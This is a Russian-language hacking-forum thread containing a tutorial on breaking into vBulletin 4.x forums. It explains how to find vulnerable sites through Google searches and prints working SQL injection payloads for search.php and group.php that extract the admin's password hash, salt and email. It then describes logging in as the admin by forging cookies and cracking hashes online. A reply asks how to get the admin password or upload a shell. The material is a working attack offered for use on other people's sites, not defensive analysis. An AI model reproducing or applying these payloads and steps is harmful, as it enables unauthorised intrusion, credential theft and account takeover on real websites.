1
  1. Этот сайт использует файлы cookie. Продолжая пользоваться данным сайтом, Вы соглашаетесь на использование нами Ваших файлов cookie. Узнать больше.
Приветствуем вас,Гость, на форуме IFUD.WS. Обязательно рекомендуется к прочтению правила форума http://ifud.ws/threads/obnovleno-pravila-foruma.7759

Взлом vBulletin 4.x.x с последующией авторизацией в админский аккаунт

Тема в разделе "Чужие", создана пользователем webster, 10 июн 2012.

  1. TopicStarter Overlay
    webster

    webster Гость

    [​IMG]



    Hello, World! На этот раз расскажу вам про взлом vBulletin 4 ветки с последующим входом в админский аккаунт, тем самым продолжая свой цикл статей про vBulletin.




    [:Что будем делать?:]




    Будем юзать известные всем (даже дошкольникам) баги в 4 ветки, а это 2 SQL-Injection, одна из них находится в search.php, другая в group.php, но эти две скули все равно связаны между собой, ибо без search.php ни одна из них работать не будет. После проведения SQL-Injection мы получим хэш и соль любого юзера (в нашем случае хэш админа). После получения хэша админа мы будем авторизироваться в аккаунт благодаря подмене кукисов, не имея при этом расшифрованного пароля.




    [:Что понадобится?:]
    • Интернет - Без него никак.
    • FireFox (Браузер, К.О) - Понадобится именно этот браузер, ибо не потребуется много времени для поиска нужных плагинов для взлома.
    • Live HTTP Header (Дополнение) - Этим дополнением будем отлавливать HTTP / GET запросы, которые происходят в браузере при определенных действиях и не только.
    • Cookie Manager (Дополнение) - Для просмотра всех кукисов которые хранятся в браузере.
    [:Ищем жертву:]



    Искать жертв проще некуда, учитывая популярность 4 ветки и неопытность юзеров, что очень разочаровывает меня, но тру хакиров это только радует. Что ж, приступим к первому шагу.

    Идем в гугл, вбиваем:



    Код:
    Powered by vBulletin 4.0.7



    Вместо 4.0.7 можно писать и другие версии от 4.0.1 до 4.1.4, но насколько я знаю фича с подменами кукисов работает не на всех версиях, однако расшифровку хэша в таких случаях никто не отменял [​IMG]

    И вот перед нами список форумов, иногда на первых страницах поиска могут быть левые ссылки, но нам нужны только такие:

    [​IMG]
    Можно определить нужный форум по подписи с версией.

    Жертву нашли, приступим к следующему шагу.




    [:SQL-Injection:]



    Вот мы на форуме и в голове всплывает вопрос: "Какую скулю юзать?". Лично я всегда начинаю с SQL-Injection в search.php, ибо эта скуля обычно не требует регистрации на форуме, но бывает и иначе, что регистрация нужна и для поиска.

    SQL-Injection в Поиске:

    Итак. Идем в поиск, который обычно располагается по адресу site.ru/path/search.php, здесь нам понадобится наш плагин Live HTTP Headers (который уже установлен, не так ли?). Включаем плагин, вбиваем в поле поиска любую чушь, к примеру: "hdajsdas" и жмем на кнопку поиска, открываем плагин и видим следующее:
    [​IMG]
    Цифрами я обозначил наши дальнейшие действия:
    1. Жмем на ссылку.
    2. Жмем кнопку повтора, чтобы можно было немного изменить запрос и отправить его еще раз.
    3. И уберите птичку с чекбокса "Фиксировать" чтобы плагин отключился.

    После нажатия кнопки "Повтор" появилось еще одно окно, там мы видим неизвестный нашему сознанию код, дописываем туда следующее:


    Код:
    humanverify[]=&searchfromtype=vBForum%3ASocialGroupMessage&do=process&contenttypeid=5&categoryid[]=-99) union select password from user where userid=1 and row(1,1)>(select count(*),concat( (select user.password) ,0x3a,floor(rand(0)*2)) x from (select 1 union select 2 union select 3)a group by x limit 1) -- /*


    Должно получиться так:

    [​IMG]

    Красной полоской я отделил первоначальный код и код который вставили мы. Пришло время рассказать вам о проблеме с который можно столкнуться после отправки этого запроса. На скрине видно, что я обвел красным кружочком "vb_" - это префикс, который может быть в названиях таблиц в базе данных, если вы отправляете запрос без префикса, а в БД таблицы с префиксом, то очевидно вы никакого хэша не получите, только ошибку. Как быть в таком случае? Все очень просто, отправляем запрос без префиксов, получаем страницу с ошибкой базы данных, открываем исходный код страницы и ищем следующее:


    [​IMG]

    Красным кружочком опять же обвел префикс, он всегда будет в этом месте и это может быть не только слово "vb_", но и другой набор букв.

    Префикс мы определили, дописали его в запрос, отправляем его и так же получаем ошибку базы данных, не пугайтесь, так и должно быть, открываем исходный код страницы и ищем:


    [​IMG]

    Это и есть хэш админа. Таким образом мы вытащили только хэш, чтобы вытащить соль нужно вставлять такой код:


    Код:
    humanverify[]=&searchfromtype=vBForum%3ASocialGroupMessage&do=process&contenttypeid=5&categoryid[]=-99) union select salt from user where userid=1 and row(1,1)>(select count(*),concat( (select user.salt) ,0x3a,floor(rand(0)*2)) x from (select 1 union select 2 union select 3)a group by x limit 1) -- /*


    Про префиксы не забываем.

    SQL-Injection в социальных группах:

    Для проведения данной SQL-Injection понадобится регистрация на форуме. Идем в социальные группы, обычно находятся по адресу: site.ru/path/group.php, перед нами список некоторых созданных групп, копируем название любой группы и идем в поиск.

    В поиске нужно поставить галочку возле чекбокса "Группы", а в поле поиска вставляем название группы которое только что скопировали, должно получится так:
    [​IMG]

    Включаем уже знакомый нам плагин: Live HTTP Header и жмем на кнопку поиска. Проделываем те же манипуляции в плагине, что и в прошлый раз. В "Повторе" дописываем уже другой код:



    Код:
    &cat[0]=1) UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt) FROM user WHERE userid=1#



    Должно получится так:
    [​IMG]

    На скрине видно, что в данной скуле префикс нужно дописывать только в одном месте.

    Что получаем после отправки запроса:


    [​IMG]

    То есть на выхлопе мы имеем гораздо больше информации по сравнению с предыдущей скулей, а это: Логин, E-Mail, хэш и соль.

    На этом можно было бы закончить, но если я так сделаю, то наверняка получу статус баяниста года, ибо таких статей про взлом vBulletin 4 ветки и так навалом, да еще и видео на youtube есть, поэтому я расскажу вам еще кое-что.





    [:Cookies:]




    Что ж, хэш у нас есть, теперь попробуем войти в аккаунт владельца хэша. Самое забавное, что нам не придется расшифровывать хэш, всего лишь немного поменять куки полученные от форума.

    Открываем наш плагин Cookie Manager, в поле "Filter Domains" пишем домен форума который является "жертвой", нажимаем на появившийся домен и справа видим все куки полученные от форума, так-как мы еще не авторизовывались там, у нас не будет главных кукисов: bb_password и bb_userid, исправим это. Идем на сайт lj.onas/md5 и делаем все, что там написано, после чего в поле "а здесь сразу же получается md5:" появится новый хэш, который понадобится нам дальше. Копируем его, возвращаемся к Cookie Manager'у и справа нажимаем на надпись "Add Cookie", чуть выше увидим поля для заполнения, в поле Name пишем: bb_password, в поле Value вставляем хэш недавно полученный на сайте lj.onas. Жмем "Add", готово, куки добавились, теперь тоже самое проделываем с bb_userid, только в Value нужно будет вписать ID пользователя чей хэш мы стырили. В итоге должно получится так:
    [​IMG]
    И последнее действие, нужно удалить bb_sessionhash, нажимаем на надпись тем самым выделяя ее и жмем Delete. Теперь все, возвращаемся к форуму, жмем F5 и вуаля, мы в аккаунте!

    Теперь спешу вас огорчить, в админку вы не зайдете, можно забанить юзера с помощью нарушений, удалить некоторые темы, сообщения, но не более. Если вам нужно именно в админку, то попасть в нее сможете только если расшифруете хэш, юзайте cmd5.ru, я с помощью него расшифровал немало хэшей, не исключение и форум который был испытательным полигоном при написании статьи [​IMG]

    На этом пожалуй закончу.




    The End.

    Автор: © p0wER
     
    • Like Like x 3
    Метки:
  2. TopicStarter Overlay
    Anti-Sat

    Anti-Sat Гость

    Есть логин и пароль от базы данных vBulletin Version 4.2.0,подскажите как вытащить пароль админа?Или залить shell?
     

Поделиться этой страницей

Загрузка...